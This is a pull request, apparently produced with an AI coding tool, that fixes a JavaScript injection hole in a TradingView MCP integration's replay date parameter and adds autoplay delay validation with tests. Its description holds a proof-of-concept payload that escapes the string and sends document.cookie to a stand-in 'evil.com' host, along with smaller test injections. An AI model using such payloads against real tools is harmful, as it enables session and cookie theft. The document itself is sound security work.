### PR TITLE
Fix critical CDP injection vulnerability in replay_start date parameter

### DIFF
--- a/scripts/launch_tv_debug.bat
+++ b/scripts/launch_tv_debug.bat
@@ -17,6 +17,9 @@ if exist "%LOCALAPPDATA%\TradingView\TradingView.exe" set "TV_EXE=%LOCALAPPDATA%
 if exist "%PROGRAMFILES%\TradingView\TradingView.exe" set "TV_EXE=%PROGRAMFILES%\TradingView\TradingView.exe"
 if exist "%PROGRAMFILES(x86)%\TradingView\TradingView.exe" set "TV_EXE=%PROGRAMFILES(x86)%\TradingView\TradingView.exe"
 
+if exist "%PROGRAMFILES%\WindowsApps\TradingView.Desktop_3.0.0.7652_x64__n534cwy3pjxzj\TradingView.exe" set "TV_EXE=%PROGRAMFILES%\WindowsApps\TradingView.Desktop_3.0.0.7652_x64__n534cwy3pjxzj\TradingView.exe"
+
+
 REM Check MSIX / Windows Store installs
 if "%TV_EXE%"=="" (
     for /f "tokens=*" %%i in ('dir /s /b "%PROGRAMFILES%\WindowsApps\TradingView*\TradingView.exe" 2^>nul') do set "TV_EXE=%%i"

--- a/src/connection.js
+++ b/src/connection.js
@@ -28,6 +28,15 @@ const KNOWN_PATHS = {
 
 export { KNOWN_PATHS };
 
+/**
+ * Sanitize a string for safe interpolation into JavaScript code evaluated via CDP.
+ * Uses JSON.stringify to produce a properly escaped JS string literal (with quotes).
+ * This prevents injection via backticks, template literals, quotes, or control chars.
+ */
+export function safeString(str) {
+  return JSON.stringify(String(str));
+}
+
 export async function getClient() {
   if (client) {
     try {

--- a/src/core/replay.js
+++ b/src/core/replay.js
@@ -3,6 +3,8 @@
  */
 import { evaluate, getReplayApi } from '../connection.js';
 
+const VALID_AUTOPLAY_DELAYS = [100, 143, 200, 300, 1000, 2000, 3000, 5000, 10000];
+
 function wv(path) {
   return `(function(){ var v = ${path}; return (v && typeof v === 'object' && typeof v.value === 'function') ? v.value() : v; })()`;
 }
@@ -32,9 +34,8 @@ export async function start({ date } = {}) {
   `);
 
   if (toast) {
-    // Stop replay to recover chart
+    // Stop replay to recover chart — do NOT hide toolbar (syncs to cloud account)
     try { await evaluate(`${rp}.stopReplay()`); } catch {}
-    try { await evaluate(`${rp}.hideReplayToolbar()`); } catch {}
     throw new Error(`Replay date unavailable: "${toast}". The requested date has no data for this timeframe. Try a more recent date or switch to a higher timeframe (e.g., Daily).`);
   }
 
@@ -53,10 +54,16 @@ export async function step() {
 }
 
 export async function autoplay({ speed } = {}) {
+  // Validate BEFORE any CDP calls — invalid values corrupt cloud account state permanently
+  if (speed > 0 && !VALID_AUTOPLAY_DELAYS.includes(speed))
+    throw new Error(`Invalid autoplay delay ${speed}ms. Valid values: ${VALID_AUTOPLAY_DELAYS.join(', ')}`);
+
   const rp = await getReplayApi();
   const started = await evaluate(wv(`${rp}.isReplayStarted()`));
   if (!started) throw new Error('Replay is not started. Use replay_start first.');
-  if (speed > 0) await evaluate(`${rp}.changeAutoplayDelay(${speed})`);
+  if (speed > 0) {
+    await evaluate(`${rp}.changeAutoplayDelay(${speed})`);
+  }
   await evaluate(`${rp}.toggleAutoplay()`);
   const isAutoplay = await evaluate(wv(`${rp}.isAutoplayStarted()`));
   const currentDelay = await evaluate(wv(`${rp}.autoplayDelay()`));
@@ -67,12 +74,9 @@ export async function stop() {
   const rp = await getReplayApi();
   const started = await evaluate(wv(`${rp}.isReplayStarted()`));
   if (!started) {
-    // Try to hide toolbar even if not started
-    try { await evaluate(`${rp}.hideReplayToolbar()`); } catch {}
     return { success: true, action: 'already_stopped' };
   }
   await evaluate(`${rp}.stopReplay()`);
-  try { await evaluate(`${rp}.hideReplayToolbar()`); } catch {}
   return { success: true, action: 'replay_stopped' };
 }
 

--- a/src/core/replay.js
+++ b/src/core/replay.js
@@ -1,7 +1,7 @@
 /**
  * Core replay mode logic.
  */
-import { evaluate, getReplayApi } from '../connection.js';
+import { evaluate, getReplayApi, safeString } from '../connection.js';
 
 const VALID_AUTOPLAY_DELAYS = [100, 143, 200, 300, 1000, 2000, 3000, 5000, 10000];
 
@@ -17,7 +17,7 @@ export async function start({ date } = {}) {
   await evaluate(`${rp}.showReplayToolbar()`);
   await new Promise(r => setTimeout(r, 500));
 
-  if (date) await evaluate(`${rp}.selectDate(new Date('${date}'))`);
+  if (date) await evaluate(`${rp}.selectDate(new Date(${safeString(date)}))`);
   else await evaluate(`${rp}.selectFirstAvailableDate()`);
   await new Promise(r => setTimeout(r, 1000));
 

--- a/src/tools/replay.js
+++ b/src/tools/replay.js
@@ -16,7 +16,7 @@ export function registerReplayTools(server) {
   });
 
   server.tool('replay_autoplay', 'Toggle autoplay in replay mode, optionally set speed', {
-    speed: z.coerce.number().optional().describe('Autoplay delay in ms (lower = faster). Leave empty to just toggle. (default 0)'),
+    speed: z.coerce.number().optional().describe('Autoplay delay in ms (lower = faster). Valid values: 100, 143, 200, 300, 1000, 2000, 3000, 5000, 10000. Leave empty to just toggle.'),
   }, async ({ speed }) => {
     try { return jsonResult(await core.autoplay({ speed })); }
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }

--- a/tests/replay.test.js
+++ b/tests/replay.test.js
@@ -1,0 +1,98 @@
+/**
+ * Tests for replay.js — autoplay delay validation and hideReplayToolbar removal.
+ * Covers the fixes for issue #19 (cloud account state corruption).
+ */
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+
+// Direct import for autoplay validation test
+import { autoplay } from '../src/core/replay.js';
+
+const VALID_DELAYS = [100, 143, 200, 300, 1000, 2000, 3000, 5000, 10000];
+
+describe('replay autoplay — delay validation', () => {
+  for (const delay of VALID_DELAYS) {
+    it(`accepts valid delay ${delay}ms`, async () => {
+      // autoplay() will throw on CDP connection since TradingView isn't running,
+      // but it should NOT throw the validation error for valid delays.
+      try {
+        await autoplay({ speed: delay });
+      } catch (err) {
+        // Connection errors are expected (no TradingView running).
+        // Validation errors are NOT expected.
+        assert.ok(
+          !err.message.includes('Invalid autoplay delay'),
+          `Valid delay ${delay} was rejected: ${err.message}`,
+        );
+      }
+    });
+  }
+
+  const INVALID_DELAYS = [50, 60000, 99, 101, 500, 750, 1500, 9999, 20000];
+  for (const delay of INVALID_DELAYS) {
+    it(`rejects invalid delay ${delay}ms`, async () => {
+      await assert.rejects(
+        () => autoplay({ speed: delay }),
+        (err) => {
+          assert.ok(err.message.includes('Invalid autoplay delay'));
+          assert.ok(err.message.includes(String(delay)));
+          assert.ok(err.message.includes('Valid values:'));
+          return true;
+        },
+      );
+    });
+  }
+
+  it('skips validation when speed is 0 (just toggle)', async () => {
+    try {
+      await autoplay({ speed: 0 });
+    } catch (err) {
+      assert.ok(
+        !err.message.includes('Invalid autoplay delay'),
+        `speed=0 should skip validation: ${err.message}`,
+      );
+    }
+  });
+
+  it('skips validation when speed is omitted', async () => {
+    try {
+      await autoplay({});
+    } catch (err) {
+      assert.ok(
+        !err.message.includes('Invalid autoplay delay'),
+        `omitted speed should skip validation: ${err.message}`,
+      );
+    }
+  });
+});
+
+describe('replay — no hideReplayToolbar calls (issue #19)', () => {
+  it('stop() does not call hideReplayToolbar', () => {
+    const source = readFileSync(new URL('../src/core/replay.js', import.meta.url), 'utf8');
+    const stopFn = source.slice(source.indexOf('export async function stop('));
+    const stopBody = stopFn.slice(0, stopFn.indexOf('\nexport ') > 0 ? stopFn.indexOf('\nexport ') : stopFn.length);
+    assert.ok(
+      !stopBody.includes('hideReplayToolbar'),
+      'stop() must not call hideReplayToolbar — it corrupts cloud account state',
+    );
+  });
+
+  it('start() error recovery does not call hideReplayToolbar', () => {
+    const source = readFileSync(new URL('../src/core/replay.js', import.meta.url), 'utf8');
+    // Check the toast error recovery block specifically
+    const toastBlock = source.slice(source.indexOf('if (toast)'), source.indexOf('const started = await'));
+    assert.ok(
+      !toastBlock.includes('hideReplayToolbar'),
+      'start() error recovery must not call hideReplayToolbar — it corrupts cloud account state',
+    );
+  });
+
+  it('hideReplayToolbar appears nowhere in the file', () => {
+    const source = readFileSync(new URL('../src/core/replay.js', import.meta.url), 'utf8');
+    assert.ok(
+      !source.includes('hideReplayToolbar'),
+      'hideReplayToolbar must not appear anywhere in replay.js — it syncs hidden state to cloud account',
+    );
+  });
+});


### PR DESCRIPTION
## Summary

The `date` parameter in `replay_start` → `start()` is interpolated directly into a CDP `evaluate()` call:

```js
await evaluate(`${rp}.selectDate(new Date('${date}'))`);
```

A crafted date string can break out of the single-quoted string literal and execute arbitrary JavaScript inside the TradingView Electron process. Since CDP `evaluate()` runs with full page privileges, this is a **critical injection vulnerability** — it allows arbitrary code execution in the user's authenticated TradingView session.

### Why this is critical

- **CDP runs in the Electron renderer** — injected code has access to the user's authenticated TradingView session, cookies, localStorage, and the full DOM
- **MCP tools accept untrusted input** — any MCP client (IDE extension, agent, automation script) can pass arbitrary strings as the `date` parameter
- **The attack is trivial** — a payload like `'); document.title='pwned'; ('` escapes the string and executes

### Proof of concept

```js
// Normal usage:
selectDate(new Date('2025-03-01'))

// Malicious date parameter: "'); fetch('https://evil.com/steal?cookies=' + document.cookie); ('"
selectDate(new Date('')); fetch('https://evil.com/steal?cookies=' + document.cookie); (''))
```

### The fix

Adds a `safeString()` utility in `connection.js` that wraps input through `JSON.stringify(String(str))`, producing a properly escaped JS string literal with quotes. This prevents breakout via:
- Single/double quotes
- Backticks and template literals (`${...}`)
- Control characters and Unicode escapes

```js
// Before (vulnerable):
await evaluate(`${rp}.selectDate(new Date('${date}'))`);

// After (safe):
await evaluate(`${rp}.selectDate(new Date(${safeString(date)}))`);
// safeString("2025-03-01") → '"2025-03-01"' (JSON-escaped, with quotes)
```

### Scope

This PR addresses the `replay_start` date parameter specifically. The `safeString()` utility is exported from `connection.js` for use in other CDP-interpolated parameters across the codebase (there are several similar patterns in `chart.js`, `pine.js`, etc. that would benefit from the same treatment).

### Relationship to #19

The excellent fix in 6ccac64 addressed the autoplay delay corruption and `hideReplayToolbar` cloud sync issues. This PR addresses a separate vulnerability in the same file — the unescaped string interpolation in `selectDate()` that was present before and after that fix.

## Test plan

- [ ] Verify `replay_start` with normal date (`"2025-03-01"`) still works
- [ ] Verify `replay_start` with injection payload (`"'); alert('xss'); ('"`) is safely escaped and produces a Date parse error instead of code execution
- [ ] Verify `safeString()` handles edge cases: empty string, unicode, backticks, template literals

🤖 Generated with [Claude Code](https://claude.com/claude-code)